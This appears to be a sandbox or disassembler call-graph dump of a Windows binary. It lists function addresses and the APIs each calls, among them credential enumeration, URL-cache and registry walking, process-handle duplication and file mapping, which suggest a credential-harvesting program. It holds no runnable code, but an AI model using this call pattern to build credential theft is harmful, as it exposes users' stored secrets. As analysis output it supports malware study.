445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 
API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 
GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39137 404363 38556->39137 38559 40bf5d 39157 40440c 38559->39157 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39160 40bd5d 28 API calls 38572->39160 39161 404423 38572->39161 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39174 4135e0 38576->39174 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 
413666 38591->38592 38592->38349 39177 4449b9 38593->39177 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39198 444972 GetVersionExW 38599->39198 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39202 444a85 42 API calls 38603->39202 38607->38602 38607->38603 39199 444aa5 42 API calls 38607->39199 39200 40a7a0 GetVersionExW 38607->39200 39201 444a85 42 API calls 38607->39201 38610 40399d 38609->38610 39203 403a16 38610->39203 38612 403a09 39217 40b1ab free free 38612->39217 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39214 40a02c CreateFileW 38614->39214 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39244 40414f memset 38634->39244 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39258 40b1ab free free 38637->39258 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39271 40a6e6 WideCharToMultiByte 38643->39271 38645 4087ed 39272 4095d9 memset 38645->39272 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 
API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39291 409b98 GetFileAttributesW 38668->39291 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39292 407fdf 75 API calls 38671->39292 39293 409b98 GetFileAttributesW 38672->39293 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39294 4082c7 198 API calls 38676->39294 39295 409b98 GetFileAttributesW 38677->39295 38680 408987 38681 4089a1 38680->38681 38682 40898c 38680->38682 39297 409b98 GetFileAttributesW 38681->39297 39296 408560 29 API calls 38682->39296 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39571 413f27 38700->39571 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39576 413959 38708->39576 39592 413ca4 38708->39592 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 
38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39606 40b1ab free free 38728->39606 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39607 40b1ab free free 38750->39607 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39608 409cea 38759->39608 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39611 414bb0 wcscpy 38764->39611 38765->38763 38767 414cd2 39612 4145ac RegQueryValueExW 38767->39612 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 
API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39613 409b98 GetFileAttributesW 38833->39613 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39614 40bb98 38836->39614 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39648 409a45 GetTempPathW 38842->39648 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39647 40a6e6 WideCharToMultiByte 38846->39647 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 
38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39660 424f26 122 API calls 38863->39660 38864 40b8bd memset 39651 425413 17 API calls 38864->39651 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39661 40a734 MultiByteToWideChar 38880->39661 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39652 4253ef 16 API calls 38885->39652 39653 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39653 39654 4253af 17 API calls 38885->39654 39655 4253cf 17 API calls 38885->39655 39656 447280 memset 38885->39656 39657 447960 memset memcpy memcpy memcpy 38885->39657 39658 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39658 39659 447920 memcpy memcpy memcpy 38885->39659 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39753 409b98 GetFileAttributesW 38898->39753 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39754 409b98 GetFileAttributesW 38906->39754 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 
38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39072 40a97a 38946->39072 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39077 40b1ab free free 38951->39077 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39078 40aa1d 38959->39078 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39080 405220 38971->39080 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 
38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39071 40b1ab free free 39020->39071 39021->39020 39022 40e540 39022->39017 39070 40e2ab 30 API calls 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b 
CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39070->39022 39071->39008 39073 40a980 39072->39073 39074 40a995 _wcsicmp 39073->39074 39075 40a99c wcscmp 39073->39075 39076 40a8bb 39073->39076 39074->39073 39075->39073 39076->38949 39076->38950 39077->38953 39079 40aa23 RegEnumValueW 39078->39079 39079->38962 39079->38963 39081 405335 39080->39081 39082 40522a 39080->39082 39081->38547 39083 40b2cc 27 API calls 39082->39083 39084 405234 39083->39084 39085 40a804 8 API calls 39084->39085 39086 40523a 39085->39086 39125 40b273 39086->39125 39088 405248 _mbscpy _mbscat GetProcAddress 39089 40b273 27 API calls 39088->39089 39090 405279 39089->39090 39128 405211 GetProcAddress 39090->39128 39092 405282 39093 40b273 27 API calls 39092->39093 39094 40528f 39093->39094 39129 405211 GetProcAddress 39094->39129 39096 405298 39097 40b273 27 API calls 39096->39097 39098 4052a5 39097->39098 39130 405211 GetProcAddress 39098->39130 39100 4052ae 39101 40b273 27 API calls 39100->39101 39102 4052bb 39101->39102 39131 405211 GetProcAddress 39102->39131 39104 4052c4 39105 40b273 27 API calls 39104->39105 39106 4052d1 39105->39106 39132 405211 GetProcAddress 39106->39132 39108 
4052da 39109 40b273 27 API calls 39108->39109 39110 4052e7 39109->39110 39133 405211 GetProcAddress 39110->39133 39112 4052f0 39113 40b273 27 API calls 39112->39113 39114 4052fd 39113->39114 39134 405211 GetProcAddress 39114->39134 39116 405306 39117 40b273 27 API calls 39116->39117 39118 405313 39117->39118 39135 405211 GetProcAddress 39118->39135 39120 40531c 39121 40b273 27 API calls 39120->39121 39122 405329 39121->39122 39136 405211 GetProcAddress 39122->39136 39124 405332 39124->39081 39126 40b58d 27 API calls 39125->39126 39127 40b18c 39126->39127 39127->39088 39128->39092 39129->39096 39130->39100 39131->39104 39132->39108 39133->39112 39134->39116 39135->39120 39136->39124 39138 40440c FreeLibrary 39137->39138 39139 40436d 39138->39139 39140 40a804 8 API calls 39139->39140 39141 404377 39140->39141 39142 404383 39141->39142 39143 404405 39141->39143 39144 40b273 27 API calls 39142->39144 39143->38559 39143->38561 39143->38562 39145 40438d GetProcAddress 39144->39145 39146 40b273 27 API calls 39145->39146 39147 4043a7 GetProcAddress 39146->39147 39148 40b273 27 API calls 39147->39148 39149 4043ba GetProcAddress 39148->39149 39150 40b273 27 API calls 39149->39150 39151 4043ce GetProcAddress 39150->39151 39152 40b273 27 API calls 39151->39152 39153 4043e2 GetProcAddress 39152->39153 39154 4043f1 39153->39154 39155 4043f7 39154->39155 39156 40440c FreeLibrary 39154->39156 39155->39143 39156->39143 39158 404413 FreeLibrary 39157->39158 39159 40441e 39157->39159 39158->39159 39159->38576 39160->38572 39162 40447e 39161->39162 39163 40442e 39161->39163 39162->38572 39164 40b2cc 27 API calls 39163->39164 39165 404438 39164->39165 39166 40a804 8 API calls 39165->39166 39167 40443e 39166->39167 39168 404445 39167->39168 39169 404467 39167->39169 39170 40b273 27 API calls 39168->39170 39169->39162 39172 404475 FreeLibrary 39169->39172 39171 40444f GetProcAddress 39170->39171 39171->39169 39173 404460 39171->39173 39172->39162 39173->39169 39175 4135f6 39174->39175 
39176 4135eb FreeLibrary 39174->39176 39175->38579 39176->39175 39178 4449c4 39177->39178 39179 444a52 39177->39179 39180 40b2cc 27 API calls 39178->39180 39179->38596 39179->38597 39181 4449cb 39180->39181 39182 40a804 8 API calls 39181->39182 39183 4449d1 39182->39183 39184 40b273 27 API calls 39183->39184 39185 4449dc GetProcAddress 39184->39185 39186 40b273 27 API calls 39185->39186 39187 4449f3 GetProcAddress 39186->39187 39188 40b273 27 API calls 39187->39188 39189 444a04 GetProcAddress 39188->39189 39190 40b273 27 API calls 39189->39190 39191 444a15 GetProcAddress 39190->39191 39192 40b273 27 API calls 39191->39192 39193 444a26 GetProcAddress 39192->39193 39194 40b273 27 API calls 39193->39194 39195 444a37 GetProcAddress 39194->39195 39196 40b273 27 API calls 39195->39196 39197 444a48 GetProcAddress 39196->39197 39197->39179 39198->38607 39199->38607 39200->38607 39201->38607 39202->38598 39204 403a29 39203->39204 39218 403bed memset memset 39204->39218 39206 403ae7 39231 40b1ab free free 39206->39231 39207 403a3f memset 39211 403a2f 39207->39211 39209 403aef 39209->38614 39210 409d1f 6 API calls 39210->39211 39211->39206 39211->39207 39211->39210 39212 409b98 GetFileAttributesW 39211->39212 39213 40a8d0 7 API calls 39211->39213 39212->39211 39213->39211 39215 40a051 GetFileTime CloseHandle 39214->39215 39216 4039ca CompareFileTime 39214->39216 39215->39216 39216->38614 39217->38615 39219 414c2e 14 API calls 39218->39219 39220 403c38 39219->39220 39221 409719 2 API calls 39220->39221 39222 403c3f wcscat 39221->39222 39223 414c2e 14 API calls 39222->39223 39224 403c61 39223->39224 39225 409719 2 API calls 39224->39225 39226 403c68 wcscat 39225->39226 39232 403af5 39226->39232 39229 403af5 20 API calls 39230 403c95 39229->39230 39230->39211 39231->39209 39233 403b02 39232->39233 39234 40ae18 9 API calls 39233->39234 39243 403b37 39234->39243 39235 403bdb 39237 40aebe FindClose 39235->39237 39236 40add4 wcscmp wcscmp 39236->39243 39238 403be6 39237->39238 
39238->39229 39239 40a8d0 7 API calls 39239->39243 39240 40ae18 9 API calls 39240->39243 39241 40ae51 9 API calls 39241->39243 39242 40aebe FindClose 39242->39243 39243->39235 39243->39236 39243->39239 39243->39240 39243->39241 39243->39242 39245 409d1f 6 API calls 39244->39245 39246 404190 39245->39246 39259 409b98 GetFileAttributesW 39246->39259 39248 40419c 39249 4041a7 6 API calls 39248->39249 39250 40435c 39248->39250 39251 40424f 39249->39251 39250->38636 39251->39250 39253 40425e memset 39251->39253 39255 409d1f 6 API calls 39251->39255 39256 40a8ab 9 API calls 39251->39256 39260 414842 39251->39260 39253->39251 39254 404296 wcscpy 39253->39254 39254->39251 39255->39251 39257 4042b6 memset memset _snwprintf wcscpy 39256->39257 39257->39251 39258->38640 39259->39248 39263 41443e 39260->39263 39262 414866 39262->39251 39264 41444b 39263->39264 39265 414451 39264->39265 39266 4144a3 GetPrivateProfileStringW 39264->39266 39267 414491 39265->39267 39268 414455 wcschr 39265->39268 39266->39262 39270 414495 WritePrivateProfileStringW 39267->39270 39268->39267 39269 414463 _snwprintf 39268->39269 39269->39270 39270->39262 39271->38645 39273 40b2cc 27 API calls 39272->39273 39274 409615 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 409625 39275->39276 39301 409b98 GetFileAttributesW 39276->39301 39278 409634 39279 409648 39278->39279 39302 4091b8 memset 39278->39302 39281 40b2cc 27 API calls 39279->39281 39283 408801 39279->39283 39282 40965d 39281->39282 39284 409d1f 6 API calls 39282->39284 39283->38648 39283->38692 39285 40966d 39284->39285 39354 409b98 GetFileAttributesW 39285->39354 39287 40967c 39287->39283 39288 409681 39287->39288 39355 409529 72 API calls 39288->39355 39290 409690 39290->39283 39291->38670 39292->38692 39293->38675 39294->38692 39295->38680 39296->38681 39301->39278 39356 40a6e6 WideCharToMultiByte 39302->39356 39304 409202 39357 444432 39304->39357 39307 40b273 27 API calls 39308 409236 39307->39308 39403 438552 39308->39403 
39311 409383 39313 40b273 27 API calls 39311->39313 39315 409399 39313->39315 39314 409254 39316 40937b 39314->39316 39424 4253cf 17 API calls 39314->39424 39317 438552 133 API calls 39315->39317 39428 424f26 122 API calls 39316->39428 39336 4093a3 39317->39336 39320 409267 39425 4253cf 17 API calls 39320->39425 39321 4094ff 39432 443d90 39321->39432 39324 4251c4 136 API calls 39324->39336 39325 409273 39426 4253af 17 API calls 39325->39426 39326 409507 39334 40951d 39326->39334 39452 408f2f 77 API calls 39326->39452 39328 4093df 39431 424f26 122 API calls 39328->39431 39330 4253cf 17 API calls 39330->39336 39334->39279 39336->39321 39336->39324 39336->39328 39336->39330 39338 4093e4 39336->39338 39429 4253af 17 API calls 39338->39429 39344 4093ed 39430 4253af 17 API calls 39344->39430 39347 4093f9 39347->39328 39348 409409 memcmp 39347->39348 39348->39328 39349 409421 memcmp 39348->39349 39350 4094a4 memcmp 39349->39350 39351 409435 39349->39351 39350->39328 39353 4094b8 memcpy memcpy 39350->39353 39351->39328 39352 409442 memcpy memcpy memcpy 39351->39352 39352->39328 39353->39328 39354->39287 39355->39290 39356->39304 39453 4438b5 39357->39453 39359 44444c 39365 409215 39359->39365 39467 415a6d 39359->39467 39362 444486 39364 4444b9 memcpy 39362->39364 39402 4444a4 39362->39402 39363 44469e 